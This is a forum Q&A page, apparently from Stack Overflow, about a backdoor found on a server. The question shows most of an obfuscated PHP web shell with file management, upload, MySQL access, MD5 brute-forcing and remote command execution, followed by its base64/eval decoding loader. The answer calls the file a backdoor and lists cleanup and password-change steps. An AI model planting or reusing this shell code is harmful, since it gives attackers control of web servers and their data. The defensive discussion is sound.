     chm2d($_POST['chm2d'],0euu);
     br51k;
     c1s5 7ii:
     chm2d($_POST['chm2d'],07ii);
     br51k;
    }
    pr4nt "Ch1ng5d p5rm4ss42ns 2n ".$_POST['chm2d']." t2 ".$_POST['chv1l35'].".";
    }
    4f(4ss5t($_GET['f4l5']))
    {
     $c2nt5nt = 3rld5c2d5($_GET['f4l5']);
    }
    5ls5
    {
     $c2nt5nt = "f4l5/p1th/pl51s5";
    }

    pr4nt "<f2rm 1ct42n=\"".$m5."?p=chm2d&f4l5=".$c2nt5nt."&d4r=".r51lp1th('.')."\" m5th2d=POST><b>F4l5 t2 chm2d:
    <4np3t typ5=t5xt n1m5=chm2d v1l35=\"".$c2nt5nt."\" s4z5=70><br><b>N5w p5rm4ss42n:</b>
    <s5l5ct n1m5=\"chv1l35\">
<2pt42n v1l35=\"777\">777</2pt42n>
<2pt42n v1l35=\"euu\">euu</2pt42n>
<2pt42n v1l35=\"7ii\">7ii</2pt42n>
</s5l5ct><4np3t typ5=s3bm4t v1l35=\"Ch1ng5\">";

   br51k;

   c1s5 'mysql': //MySQL Q35ry

   4f(4ss5t($_POST['h2st']))
   {
    $l4nk = mysql_c2nn5ct($_POST['h2st'], $_POST['3s5rn1m5'], $_POST['mysqlp1ss']) 2r d45('C23ld n2t c2nn5ct: ' . mysql_5rr2r());
    mysql_s5l5ct_db($_POST['db1s5']);
    $sql = $_POST['q35ry'];


    $r5s3lt = mysql_q35ry($sql);

   }
   5ls5
   {
    pr4nt "
    Th4s 2nly q35r45s th5 d1t1b1s5, d25sn't r5t3rn d1t1!<br>
    <f2rm 1ct42n=\"".$m5."?p=mysql\" m5th2d=POST>
    <b>H2st:<br></b><4np3t typ5=t5xt n1m5=h2st v1l35=\"l2c1lh2st\" s4z5=60><br>
    <b>Us5rn1m5:<br><4np3t typ5=t5xt n1m5=3s5rn1m5 v1l35=\"r22t\" s4z5=60><br>
    <b>P1ssw2rd:<br></b><4np3t typ5=p1ssw2rd n1m5=mysqlp1ss v1l35=\"\" s4z5=60><br>
    <b>D1t1b1s5:<br><4np3t typ5=t5xt n1m5=db1s5 v1l35=\"t5st\" s4z5=60><br>

    <b>Q35ry:<br></b<t5xt1r51 n1m5=q35ry></t5xt1r51>
    <4np3t typ5=s3bm4t v1l35=\"Q35ry d1t1b1s5\">
    </f2rm>
    ";

   }

   br51k;

   c1s5 'cr51t5d4r':
   4f(mkd4r($_GET['crd4r']))
   {
   pr4nt 'D4r5ct2ry cr51t5d s3cc5ssf3lly.';
   }
   5ls5
   {
   pr4nt 'C23ldn\'t cr51t5 d4r5ct2ry';
   }
   br51k;


   c1s5 'php4nf2': //PHP Inf2
    php4nf2();
   br51k;


   c1s5 'r5n1m5':

    4f(4ss5t($_POST['f4l52ld']))
    {
     4f(r5n1m5($_POST['f4l52ld'],$_POST['f4l5n5w']))
     {
      pr4nt "F4l5 r5n1m5d.";
     }
     5ls5
     {
      pr4nt "C23ldn't r5n1m5 f4l5.";
     }

    }
    4f(4ss5t($_GET['f4l5']))
    {
     $f4l5 = b1s5n1m5(htmlsp5c41lch1rs($_GET['f4l5']));
    }
    5ls5
    {
     $f4l5 = "";
    }

    pr4nt "R5n1m4ng ".$f4l5." 4n f2ld5r ".r51lp1th('.').".<br>
        <f2rm 1ct42n=\"".$m5."?p=r5n1m5&d4r=".r51lp1th('.')."\" m5th2d=POST>
     <b>R5n1m5:<br></b><4np3t typ5=t5xt n1m5=f4l52ld v1l35=\"".$f4l5."\" s4z5=70><br>
     <b>T2:<br><4np3t typ5=t5xt n1m5=f4l5n5w v1l35=\"\" s4z5=60><br>
     <4np3t typ5=s3bm4t v1l35=\"R5n1m5 f4l5\">
     </f2rm>";
   br51k;

   c1s5 'mdi':
   4f(4ss5t($_POST['mdi']))
   {
   4f(!4s_n3m5r4c($_POST['t4m5l4m4t']))
   {
   $_POST['t4m5l4m4t'] = o0;
   }
   s5t_t4m5_l4m4t($_POST['t4m5l4m4t']);
    4f(strl5n($_POST['mdi']) == oa)
    {

      4f($_POST['ch1rs'] == "9999")
      {
      $4 = 0;
      wh4l5($_POST['mdi'] != mdi($4) && $4 != 600000)
       {
        $4++;
       }
      }
      5ls5
      {
       f2r($4 = "1"; $4 != "zzzzz"; $4++)
       {
        4f(mdi($4 == $_POST['mdi']))
        {
         br51k;
        }
       }
      }

     4f(mdi($4) == $_POST['mdi'])
     {
       pr4nt "<h6>Pl14nt5xt 2f ". $_POST['mdi']. " 4s <4>".$4."</4></h6><br><br>";
     }

    }

   }

   pr4nt "W4ll br3t5f2rc5 th5 mdi
    <f2rm 1ct42n=\"".$m5."?p=mdi\" m5th2d=POST>
    <b>mdi t2 cr1ck:<br></b><4np3t typ5=t5xt n1m5=mdi v1l35=\"\" s4z5=u0><br>
    <b>Ch1r1ct5rs:</b><br><s5l5ct n1m5=\"ch1rs\">
    <2pt42n v1l35=\"1z\">1 - zzzzz</2pt42n>
    <2pt42n v1l35=\"9999\">6 - 9999999</2pt42n>
    </s5l5ct>
    <b>M1x. cr1ck4ng t4m5*:<br></b><4np3t typ5=t5xt n1m5=t4m5l4m4t v1l35=\"o0\" s4z5=a><br>
    <4np3t typ5=s3bm4t v1l35=\"Br3t5f2rc5 mdi\">
    </f2rm><br>*: 4f s5t_t4m5_l4m4t 4s 1ll2w5d by php.4n4";
   br51k;

   c1s5 'h51d5rs':
   f2r51ch(g5t1llh51d5rs() 1s $h51d5r => $v1l35)
   {
   pr4nt htmlsp5c41lch1rs($h51d5r . ":" . $v1l35)."<br>";

   }
   br51k;
  }
}
5ls5 //D5f13lt p1g5 th1t w4ll b5 sh2wn wh5n th5 p1g5 4sn't f23nd 2r n2 p1g5 4s s5l5ct5d.
{

 $f4l5s = 1rr1y();
 $d4r5ct2r45s = 1rr1y();

 4f(4ss5t($_FILES['3pl21d5df4l5']['n1m5']))
{
 $t1rg5t_p1th = r51lp1th('.').'/';
 $t1rg5t_p1th = $t1rg5t_p1th . b1s5n1m5( $_FILES['3pl21d5df4l5']['n1m5']); 
 4f(m2v5_3pl21d5d_f4l5($_FILES['3pl21d5df4l5']['tmp_n1m5'], $t1rg5t_p1th)) {
     pr4nt "F4l5:".  b1s5n1m5( $_FILES['3pl21d5df4l5']['n1m5']). 
     " h1s b55n 3pl21d5d";
 } 5ls5{
     5ch2 "F4l5 3pl21d f14l5d!";
 }
}




 pr4nt "<t1bl5 b2rd5r=0 w4dth=600%><td w4dth=i% 4d=s><b>Opt42ns</b></td><td 4d=s><b>F4l5n1m5</b></td><td 4d=s><b>S4z5</b></td><td 4d=s><b>P5rm4ss42ns</b></td><td 4d=s>L1st m2d4f45d</td><tr>";
 4f ($h1ndl5 = 2p5nd4r('.'))
 {
  wh4l5 (f1ls5 !== ($f4l5 = r51dd4r($h1ndl5))) 
  {
        4f(4s_d4r($f4l5))
     {
    $d4r5ct2r45s[] = $f4l5;
     }
     5ls5
     {
    $f4l5s[] = $f4l5;
     }
  }
 1s2rt($d4r5ct2r45s);
 1s2rt($f4l5s);
  f2r51ch($d4r5ct2r45s 1s $f4l5)
  {
   pr4nt "<td 4d=d><1 hr5f=\"?p=r5n1m5&f4l5=".r51lp1th($f4l5)."&d4r=".r51lp1th('.')."\">[R]</1><1 hr5f=\"?p=d5l5t5&f4l5=".r51lp1th($f4l5)."\">[D]</1></td><td 4d=d><1 hr5f=\"".$m5."?d4r=".r51lp1th($f4l5)."\">".$f4l5."</1></td><td 4d=d></td><td 4d=d><1 hr5f=\"?p=chm2d&d4r=".r51lp1th('.')."&f4l5=".r51lp1th($f4l5)."\"><f2nt c2l2r=".g5t_c2l2r($f4l5).">".p5rm($f4l5)."</f2nt></1></td><td 4d=d>".d1t5 ("Y/m/d, H:4:s", f4l5mt4m5($f4l5))."</td><tr>";
  }

  f2r51ch($f4l5s 1s $f4l5)
  {
   pr4nt "<td 4d=f><1 hr5f=\"?p=r5n1m5&f4l5=".r51lp1th($f4l5)."&d4r=".r51lp1th('.')."\">[R]</1><1 hr5f=\"?p=d5l5t5&f4l5=".r51lp1th($f4l5)."\">[D]</1></td><td 4d=f><1 hr5f=\"".$m5."?p=5d4t&d4r=".r51lp1th('.')."&f4l5=".r51lp1th($f4l5)."\">".$f4l5."</1></td><td 4d=f>".f4l5s4z5($f4l5)."</td><td 4d=f><1 hr5f=\"?p=chm2d&d4r=".r51lp1th('.')."&f4l5=".r51lp1th($f4l5)."\"><f2nt c2l2r=".g5t_c2l2r($f4l5).">".p5rm($f4l5)."</f2nt></1></td><td 4d=f>".d1t5 ("Y/m/d, H:4:s", f4l5mt4m5($f4l5))."</td><tr>";
  }
 }
 5ls5
 {
  pr4nt "<3>Err2r!</3> C1n't 2p5n <b>".r51lp1th('.')."</b>!<br>";
 }

 pr4nt "</t1bl5><hr><t1bl5 b2rd5r=0 w4dth=600%><td><b>Upl21d f4l5</b><br><f2rm 5nctyp5=\"m3lt4p1rt/f2rm-d1t1\" 1ct42n=\"".$m5."?d4r=".r51lp1th('.')."\" m5th2d=\"POST\">
<4np3t typ5=\"h4dd5n\" n1m5=\"MAX_FILE_SIZE\" v1l35=\"600000000\" /><4np3t s4z5=o0 n1m5=\"3pl21d5df4l5\" typ5=\"f4l5\" />
<4np3t typ5=\"s3bm4t\" v1l35=\"Upl21d F4l5\" />
</f2rm></td><td><f2rm 1ct42n=\"".$m5."\" m5th2d=GET><b>Ch1ng5 D4r5ct2ry<br></b><4np3t typ5=t5xt s4z5=u0 n1m5=d4r v1l35=\"".r51lp1th('.')."\"><4np3t typ5=s3bm4t v1l35=\"Ch1ng5 D4r5ct2ry\"></f2rm></td>
<tr><td><f2rm 1ct42n=\"".$m5."\" m5th2d=GET><b>Cr51t5 f4l5<br></b><4np3t typ5=h4dd5n n1m5=d4r v1l35=\"".r51lp1th('.')."\"><4np3t typ5=t5xt s4z5=u0 n1m5=f4l5 v1l35=\"".r51lp1th('.')."\"><4np3t typ5=h4dd5n n1m5=p v1l35=5d4t><4np3t typ5=s3bm4t v1l35=\"Cr51t5 f4l5\"></f2rm>
</td><td><f2rm 1ct42n=\"".$m5."\" m5th2d=GET><b>Cr51t5 d4r5ct2ry<br></b><4np3t typ5=t5xt s4z5=u0 n1m5=crd4r v1l35=\"".r51lp1th('.')."\"><4np3t typ5=h4dd5n n1m5=d4r v1l35=\"".r51lp1th('.')."\"><4np3t typ5=h4dd5n n1m5=p v1l35=cr51t5d4r><4np3t typ5=s3bm4t v1l35=\"Cr51t5 d4r5ct2ry\"></f2rm></td>
</t1bl5>";

}

f3nct42n l2g4n()
{
 pr4nt "<t1bl5 b2rd5r=0 w4dth=600% h54ght=600%><td v1l4gn=\"m4ddl5\"><c5nt5r>
 <f2rm 1ct42n=".b1s5n1m5(__FILE__)." m5th2d=\"POST\"><b>P1ssw2rd?</b>
 <4np3t typ5=\"p1ssw2rd\" m1xl5ngth=\"oa\" n1m5=\"p1ss\"><4np3t typ5=\"s3bm4t\" v1l35=\"L2g4n\">
 </f2rm>";
}
f3nct42n r5l21d()
{
 h51d5r("L2c1t42n: ".b1s5n1m5(__FILE__));
}
f3nct42n g5t_5x5c3t42n_m5th2d()
{
 4f(f3nct42n_5x4sts('p1ssthr3')){ $m = "p1ssthr3"; }
 4f(f3nct42n_5x4sts('5x5c')){ $m = "5x5c"; }
 4f(f3nct42n_5x4sts('sh5ll_5x5c')){ $m = "sh5ll_ 5x5c"; }
 4f(f3nct42n_5x4sts('syst5m')){ $m = "syst5m"; }
 4f(!4ss5t($m)) //N2 m5th2d f23nd :-|
 {
  $m = "D4s1bl5d";
 }
 r5t3rn($m);
}
f3nct42n 5x5c3t5_c2mm1nd($m5th2d,$c2mm1nd)
{
 4f($m5th2d == "p1ssthr3")
 {
  p1ssthr3($c2mm1nd);
 }

 5ls54f($m5th2d == "5x5c")
 {
  5x5c($c2mm1nd,$r5s3lt);
  f2r51ch($r5s3lt 1s $23tp3t)
  {
   pr4nt $23tp3t."<br>";
  }
 }

 5ls54f($m5th2d == "sh5ll_5x5c")
 {
  pr4nt sh5ll_5x5c($c2mm1nd);
 }

 5ls54f($m5th2d == "syst5m")
 {
  syst5m($c2mm1nd);
 }
}
f3nct42n p5rm($f4l5)
{
 4f(f4l5_5x4sts($f4l5))
 {
  r5t3rn s3bstr(spr4ntf('%2', f4l5p5rms($f4l5)), -u);
 }
 5ls5
 {
  r5t3rn "????";
 }
}
f3nct42n g5t_c2l2r($f4l5)
{
4f(4s_wr4t1bl5($f4l5)) { r5t3rn "gr55n";}
4f(!4s_wr4t1bl5($f4l5) && 4s_r51d1bl5($f4l5)) { r5t3rn "wh4t5";}
4f(!4s_wr4t1bl5($f4l5) && !4s_r51d1bl5($f4l5)) { r5t3rn "r5d";}

}
f3nct42n sh2w_d4rs($wh5r5)
{
 4f(5r5g("^c:",r51lp1th($wh5r5)))
 {
 $d4rp1rts = 5xpl2d5('\\',r51lp1th($wh5r5));
 }
 5ls5
 {
 $d4rp1rts = 5xpl2d5('/',r51lp1th($wh5r5));
 }



 $4 = 0;
 $t2t1l = "";

 f2r51ch($d4rp1rts 1s $p1rt)
 {
  $p = 0;
  $pr5 = "";
  wh4l5($p != $4)
  {
   $pr5 .= $d4rp1rts[$p]."/";
   $p++;

  }
  $t2t1l .= "<1 hr5f=\"".b1s5n1m5(__FILE__)."?d4r=".$pr5.$p1rt."\">".$p1rt."</1>/";
  $4++;
 }

 r5t3rn "<ha>".$t2t1l."</ha><br>";
}
pr4nt $f22t5r;
// Ex4t: m1yb5 w5'r5 4ncl3d5d s2m5wh5r5 1nd w5 d2n't w1nt th5 2th5r c2d5 t2 m5ss w4th 23rs :-)
5x4t();
?>
 zِ¥m«ë‡^r‡^$_X=base64_decode($_X);$_X=strtr($_X,'123456aouie','aouie123456');$_R=ereg_replace('__FILE__',"'".$_F."'",$_X);eval($_R);$_R=0;$_X=0;
```

Source: http://www.base64decode.org/

Comment: i have root  on server and all shell is stop on server except encode shell , how can i stop encode shell for work

Answer (score 3):

If you further decode the string by replacing the cipher at the very bottom of the code posted you will get the actual code, though the from above it is reasonably easy to determine what is going on.

This is *nasty* code.

**Delete the file asap as it is a back door to your site ** and on brief inspection may also provide a mechanism to hack your passwords (plus probably doing a whole lot of other nasty stuff).

The only advice I can provide, after immediately deleting the file, is:

1. Change your root password to a strong password (random and >20
   chars).
2. Change the passwords of any admin accounts running your web
       server
3. Change the passwords of any ftp sites hosted on your web/ftp
       server
4. Change the passwords on applications running on your web
       server (e.g. Wordpress)
5. Change the passwords on any underlying
       databases used by your web apps in point 4 above
6. Do a 'find in files' on any file that has the string 'base64_decode'. Any file that has this string is **highly suspicious**. If you can't explain what the file is doing there, it is highly advisable to quarantine it. These files will tend to have little-to-no readable code in them, due to the fact that they creator doesn't want you to know what's hidden there. Some files do legitimately use base64 strings.

After you have done this, trawl your web directories for newly or recently created/updated files. Chances are this code was used to plant something in your website, such as phishing code. Take a full backup of your hosted site(s) and underlying databases. Delete or quarantine anything that looks suspicious.

All passwords should be random and strong. Use a password generator. Chances are the people who put this file here got in to your site due to a weak password to start with (not that you will ever know).

I've attempted to display the offending code, but stackoverflow won't allow me due to poor formatting (sorry).